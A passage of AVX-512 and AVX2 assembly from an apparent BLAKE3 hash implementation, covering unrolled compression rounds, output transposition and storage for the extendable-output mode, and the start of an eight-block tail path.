vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm23
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm16
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm18
vpaddd zmm1,zmm1,zmm19
vpaddd zmm2,zmm2,zmm17
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm25
vpaddd zmm1,zmm1,zmm27
vpaddd zmm2,zmm2,zmm24
vpaddd zmm3,zmm3,zmm31
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm30
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm28
vpaddd zmm3,zmm3,zmm17
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm29
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm18
vpaddd zmm3,zmm3,zmm20
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm19
vpaddd zmm1,zmm1,zmm26
vpaddd zmm2,zmm2,zmm22
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
vpaddd zmm0,zmm0,zmm27
vpaddd zmm1,zmm1,zmm21
vpaddd zmm2,zmm2,zmm17
vpaddd zmm3,zmm3,zmm24
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vprord zmm15,zmm15,0x10
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0xc
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vpaddd zmm0,zmm0,zmm31
vpaddd zmm1,zmm1,zmm16
vpaddd zmm2,zmm2,zmm25
vpaddd zmm3,zmm3,zmm22
vpaddd zmm0,zmm0,zmm4
vpaddd zmm1,zmm1,zmm5
vpaddd zmm2,zmm2,zmm6
vpaddd zmm3,zmm3,zmm7
vpxord zmm12,zmm12,zmm0
vpxord zmm13,zmm13,zmm1
vpxord zmm14,zmm14,zmm2
vpxord zmm15,zmm15,zmm3
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vprord zmm15,zmm15,0x8
vpaddd zmm8,zmm8,zmm12
vpaddd zmm9,zmm9,zmm13
vpaddd zmm10,zmm10,zmm14
vpaddd zmm11,zmm11,zmm15
vpxord zmm4,zmm4,zmm8
vpxord zmm5,zmm5,zmm9
vpxord zmm6,zmm6,zmm10
vpxord zmm7,zmm7,zmm11
vprord zmm4,zmm4,0x7
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vpaddd zmm0,zmm0,zmm30
vpaddd zmm1,zmm1,zmm18
vpaddd zmm2,zmm2,zmm19
vpaddd zmm3,zmm3,zmm23
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x10
vprord zmm12,zmm12,0x10
vprord zmm13,zmm13,0x10
vprord zmm14,zmm14,0x10
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0xc
vprord zmm6,zmm6,0xc
vprord zmm7,zmm7,0xc
vprord zmm4,zmm4,0xc
vpaddd zmm0,zmm0,zmm26
vpaddd zmm1,zmm1,zmm28
vpaddd zmm2,zmm2,zmm20
vpaddd zmm3,zmm3,zmm29
vpaddd zmm0,zmm0,zmm5
vpaddd zmm1,zmm1,zmm6
vpaddd zmm2,zmm2,zmm7
vpaddd zmm3,zmm3,zmm4
vpxord zmm15,zmm15,zmm0
vpxord zmm12,zmm12,zmm1
vpxord zmm13,zmm13,zmm2
vpxord zmm14,zmm14,zmm3
vprord zmm15,zmm15,0x8
vprord zmm12,zmm12,0x8
vprord zmm13,zmm13,0x8
vprord zmm14,zmm14,0x8
vpaddd zmm10,zmm10,zmm15
vpaddd zmm11,zmm11,zmm12
vpaddd zmm8,zmm8,zmm13
vpaddd zmm9,zmm9,zmm14
vpxord zmm5,zmm5,zmm10
vpxord zmm6,zmm6,zmm11
vpxord zmm7,zmm7,zmm8
vpxord zmm4,zmm4,zmm9
vprord zmm5,zmm5,0x7
vprord zmm6,zmm6,0x7
vprord zmm7,zmm7,0x7
vprord zmm4,zmm4,0x7
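// XOF feed-forward: zmm0-zmm7 become the first 32 output bytes (state
// halves XORed); zmm8-zmm15 become the second 32 bytes, XORed with the
// broadcast input CV words.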
vpxord zmm0,zmm0,zmm8
vpxord zmm1,zmm1,zmm9
vpxord zmm2,zmm2,zmm10
vpxord zmm3,zmm3,zmm11
vpxord zmm4,zmm4,zmm12
vpxord zmm5,zmm5,zmm13
vpxord zmm6,zmm6,zmm14
vpxord zmm7,zmm7,zmm15
vpxord zmm8,zmm8,DWORD PTR [rdi]{1to16}
vpxord zmm9,zmm9,DWORD PTR [rdi+0x4]{1to16}
vpxord zmm10,zmm10,DWORD PTR [rdi+0x8]{1to16}
vpxord zmm11,zmm11,DWORD PTR [rdi+0xc]{1to16}
vpxord zmm12,zmm12,DWORD PTR [rdi+0x10]{1to16}
vpxord zmm13,zmm13,DWORD PTR [rdi+0x14]{1to16}
vpxord zmm14,zmm14,DWORD PTR [rdi+0x18]{1to16}
vpxord zmm15,zmm15,DWORD PTR [rdi+0x1c]{1to16}
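// Transpose the 16 lanes of 16 state words into 16 contiguous 64-byte
// output blocks: 32-bit unpacks, 64-bit unpacks, then two vshufi32x4
// passes.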
vpunpckldq zmm16,zmm0,zmm1
vpunpckhdq zmm17,zmm0,zmm1
vpunpckldq zmm18,zmm2,zmm3
vpunpckhdq zmm19,zmm2,zmm3
vpunpckldq zmm20,zmm4,zmm5
vpunpckhdq zmm21,zmm4,zmm5
vpunpckldq zmm22,zmm6,zmm7
vpunpckhdq zmm23,zmm6,zmm7
vpunpckldq zmm24,zmm8,zmm9
vpunpckhdq zmm25,zmm8,zmm9
vpunpckldq zmm26,zmm10,zmm11
vpunpckhdq zmm27,zmm10,zmm11
vpunpckldq zmm28,zmm12,zmm13
vpunpckhdq zmm29,zmm12,zmm13
vpunpckldq zmm30,zmm14,zmm15
vpunpckhdq zmm31,zmm14,zmm15
vpunpcklqdq zmm0,zmm16,zmm18
vpunpckhqdq zmm1,zmm16,zmm18
vpunpcklqdq zmm2,zmm17,zmm19
vpunpckhqdq zmm3,zmm17,zmm19
vpunpcklqdq zmm4,zmm20,zmm22
vpunpckhqdq zmm5,zmm20,zmm22
vpunpcklqdq zmm6,zmm21,zmm23
vpunpckhqdq zmm7,zmm21,zmm23
vpunpcklqdq zmm8,zmm24,zmm26
vpunpckhqdq zmm9,zmm24,zmm26
vpunpcklqdq zmm10,zmm25,zmm27
vpunpckhqdq zmm11,zmm25,zmm27
vpunpcklqdq zmm12,zmm28,zmm30
vpunpckhqdq zmm13,zmm28,zmm30
vpunpcklqdq zmm14,zmm29,zmm31
vpunpckhqdq zmm15,zmm29,zmm31
vshufi32x4 zmm16,zmm0,zmm4,0x88
vshufi32x4 zmm17,zmm1,zmm5,0x88
vshufi32x4 zmm18,zmm2,zmm6,0x88
vshufi32x4 zmm19,zmm3,zmm7,0x88
vshufi32x4 zmm20,zmm0,zmm4,0xdd
vshufi32x4 zmm21,zmm1,zmm5,0xdd
vshufi32x4 zmm22,zmm2,zmm6,0xdd
vshufi32x4 zmm23,zmm3,zmm7,0xdd
vshufi32x4 zmm24,zmm8,zmm12,0x88
vshufi32x4 zmm25,zmm9,zmm13,0x88
vshufi32x4 zmm26,zmm10,zmm14,0x88
vshufi32x4 zmm27,zmm11,zmm15,0x88
vshufi32x4 zmm28,zmm8,zmm12,0xdd
vshufi32x4 zmm29,zmm9,zmm13,0xdd
vshufi32x4 zmm30,zmm10,zmm14,0xdd
vshufi32x4 zmm31,zmm11,zmm15,0xdd
vshufi32x4 zmm0,zmm16,zmm24,0x88
vshufi32x4 zmm1,zmm17,zmm25,0x88
vshufi32x4 zmm2,zmm18,zmm26,0x88
vshufi32x4 zmm3,zmm19,zmm27,0x88
vshufi32x4 zmm4,zmm20,zmm28,0x88
vshufi32x4 zmm5,zmm21,zmm29,0x88
vshufi32x4 zmm6,zmm22,zmm30,0x88
vshufi32x4 zmm7,zmm23,zmm31,0x88
vshufi32x4 zmm8,zmm16,zmm24,0xdd
vshufi32x4 zmm9,zmm17,zmm25,0xdd
vshufi32x4 zmm10,zmm18,zmm26,0xdd
vshufi32x4 zmm11,zmm19,zmm27,0xdd
vshufi32x4 zmm12,zmm20,zmm28,0xdd
vshufi32x4 zmm13,zmm21,zmm29,0xdd
vshufi32x4 zmm14,zmm22,zmm30,0xdd
vshufi32x4 zmm15,zmm23,zmm31,0xdd
vmovdqu32 ZMMWORD PTR [r9],zmm0
vmovdqu32 ZMMWORD PTR [r9+0x40],zmm1
vmovdqu32 ZMMWORD PTR [r9+0x80],zmm2
vmovdqu32 ZMMWORD PTR [r9+0xc0],zmm3
vmovdqu32 ZMMWORD PTR [r9+0x100],zmm4
vmovdqu32 ZMMWORD PTR [r9+0x140],zmm5
vmovdqu32 ZMMWORD PTR [r9+0x180],zmm6
vmovdqu32 ZMMWORD PTR [r9+0x1c0],zmm7
vmovdqu32 ZMMWORD PTR [r9+0x200],zmm8
vmovdqu32 ZMMWORD PTR [r9+0x240],zmm9
vmovdqu32 ZMMWORD PTR [r9+0x280],zmm10
vmovdqu32 ZMMWORD PTR [r9+0x2c0],zmm11
vmovdqu32 ZMMWORD PTR [r9+0x300],zmm12
vmovdqu32 ZMMWORD PTR [r9+0x340],zmm13
vmovdqu32 ZMMWORD PTR [r9+0x380],zmm14
vmovdqu32 ZMMWORD PTR [r9+0x3c0],zmm15
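// Advance every lane counter by 16 (with carry, as in the prologue) and
// loop while at least 16 output blocks remain.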
vmovdqa32 zmm0,ZMMWORD PTR [rsp]
vmovdqa32 zmm1,ZMMWORD PTR [rsp+0x40]
vpaddd zmm2,zmm0,DWORD PTR [ADD16+rip]{1to16}
vpcmpltud k1,zmm2,zmm0
vpaddd zmm1{k1},zmm1,DWORD PTR [ADD1+rip]{1to16}
vmovdqa32 ZMMWORD PTR [rsp],zmm2
vmovdqa32 ZMMWORD PTR [rsp+0x40],zmm1
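// Bump the output pointer by 16*64 bytes; loop while at least 16
// blocks remain, else fall through to the smaller tails.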
add r9,0x400
sub r10,0x10
cmp r10,0x10
jae 3b
test r10,r10
jne 2f
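// Common exit: clear the upper vector state and restore the frame.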
9:
vzeroupper
mov rsp,rbp
pop rbp
ret
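// Tail: with fewer than 16 blocks left, bit 3 of r10 set means 8 can
// still be produced in parallel with 256-bit registers.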
2:
test r10,0x8
je 2f
vpbroadcastd ymm16,DWORD PTR [rsi]
vpbroadcastd ymm17,DWORD PTR [rsi+0x4]
vpbroadcastd ymm18,DWORD PTR [rsi+0x8]
vpbroadcastd ymm19,DWORD PTR [rsi+0xc]
vpbroadcastd ymm20,DWORD PTR [rsi+0x10]
vpbroadcastd ymm21,DWORD PTR [rsi+0x14]
vpbroadcastd ymm22,DWORD PTR [rsi+0x18]
vpbroadcastd ymm23,DWORD PTR [rsi+0x1c]
vpbroadcastd ymm24,DWORD PTR [rsi+0x20]
vpbroadcastd ymm25,DWORD PTR [rsi+0x24]
vpbroadcastd ymm26,DWORD PTR [rsi+0x28]
vpbroadcastd ymm27,DWORD PTR [rsi+0x2c]
vpbroadcastd ymm28,DWORD PTR [rsi+0x30]
vpbroadcastd ymm29,DWORD PTR [rsi+0x34]
vpbroadcastd ymm30,DWORD PTR [rsi+0x38]
vpbroadcastd ymm31,DWORD PTR [rsi+0x3c]
vpbroadcastd ymm0,DWORD PTR [rdi]
vpbroadcastd ymm1,DWORD PTR [rdi+0x4]
vpbroadcastd ymm2,DWORD PTR [rdi+0x8]
vpbroadcastd ymm3,DWORD PTR [rdi+0xc]
vpbroadcastd ymm4,DWORD PTR [rdi+0x10]
vpbroadcastd ymm5,DWORD PTR [rdi+0x14]
vpbroadcastd ymm6,DWORD PTR [rdi+0x18]
vpbroadcastd ymm7,DWORD PTR [rdi+0x1c]
vpbroadcastd ymm8,DWORD PTR [BLAKE3_IV_0+rip]
vpbroadcastd ymm9,DWORD PTR [BLAKE3_IV_1+rip]
vpbroadcastd ymm10,DWORD PTR [BLAKE3_IV_2+rip]
vpbroadcastd ymm11,DWORD PTR [BLAKE3_IV_3+rip]
vmovdqa ymm12,YMMWORD PTR [rsp]
vmovdqa ymm13,YMMWORD PTR [rsp+0x40]
vpbroadcastd ymm14,edx
vpbroadcastd ymm15,r8d
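// Seven unrolled rounds follow. The message permutation between rounds
// is baked into which of ymm16-ymm31 feeds each G mix, so the message
// registers themselves are never shuffled.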
vpaddd ymm0,ymm0,ymm16
vpaddd ymm1,ymm1,ymm18
vpaddd ymm2,ymm2,ymm20
vpaddd ymm3,ymm3,ymm22
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm17
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm21
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm24
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm28
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm25
vpaddd ymm1,ymm1,ymm27
vpaddd ymm2,ymm2,ymm29
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm18
vpaddd ymm1,ymm1,ymm19
vpaddd ymm2,ymm2,ymm23
vpaddd ymm3,ymm3,ymm20
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm22
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm16
vpaddd ymm3,ymm3,ymm29
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0x7
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vpaddd ymm0,ymm0,ymm17
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm25
vpaddd ymm3,ymm3,ymm31
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x10
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vprord ymm4,ymm4,0xc
vpaddd ymm0,ymm0,ymm27
vpaddd ymm1,ymm1,ymm21
vpaddd ymm2,ymm2,ymm30
vpaddd ymm3,ymm3,ymm24
vpaddd ymm0,ymm0,ymm5
vpaddd ymm1,ymm1,ymm6
vpaddd ymm2,ymm2,ymm7
vpaddd ymm3,ymm3,ymm4
vpxord ymm15,ymm15,ymm0
vpxord ymm12,ymm12,ymm1
vpxord ymm13,ymm13,ymm2
vpxord ymm14,ymm14,ymm3
vprord ymm15,ymm15,0x8
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vpaddd ymm10,ymm10,ymm15
vpaddd ymm11,ymm11,ymm12
vpaddd ymm8,ymm8,ymm13
vpaddd ymm9,ymm9,ymm14
vpxord ymm5,ymm5,ymm10
vpxord ymm6,ymm6,ymm11
vpxord ymm7,ymm7,ymm8
vpxord ymm4,ymm4,ymm9
vprord ymm5,ymm5,0x7
vprord ymm6,ymm6,0x7
vprord ymm7,ymm7,0x7
vprord ymm4,ymm4,0x7
vpaddd ymm0,ymm0,ymm19
vpaddd ymm1,ymm1,ymm26
vpaddd ymm2,ymm2,ymm29
vpaddd ymm3,ymm3,ymm23
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x10
vprord ymm13,ymm13,0x10
vprord ymm14,ymm14,0x10
vprord ymm15,ymm15,0x10
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
vpxord ymm7,ymm7,ymm11
vprord ymm4,ymm4,0xc
vprord ymm5,ymm5,0xc
vprord ymm6,ymm6,0xc
vprord ymm7,ymm7,0xc
vpaddd ymm0,ymm0,ymm20
vpaddd ymm1,ymm1,ymm28
vpaddd ymm2,ymm2,ymm18
vpaddd ymm3,ymm3,ymm30
vpaddd ymm0,ymm0,ymm4
vpaddd ymm1,ymm1,ymm5
vpaddd ymm2,ymm2,ymm6
vpaddd ymm3,ymm3,ymm7
vpxord ymm12,ymm12,ymm0
vpxord ymm13,ymm13,ymm1
vpxord ymm14,ymm14,ymm2
vpxord ymm15,ymm15,ymm3
vprord ymm12,ymm12,0x8
vprord ymm13,ymm13,0x8
vprord ymm14,ymm14,0x8
vprord ymm15,ymm15,0x8
vpaddd ymm8,ymm8,ymm12
vpaddd ymm9,ymm9,ymm13
vpaddd ymm10,ymm10,ymm14
vpaddd ymm11,ymm11,ymm15
vpxord ymm4,ymm4,ymm8
vpxord ymm5,ymm5,ymm9
vpxord ymm6,ymm6,ymm10
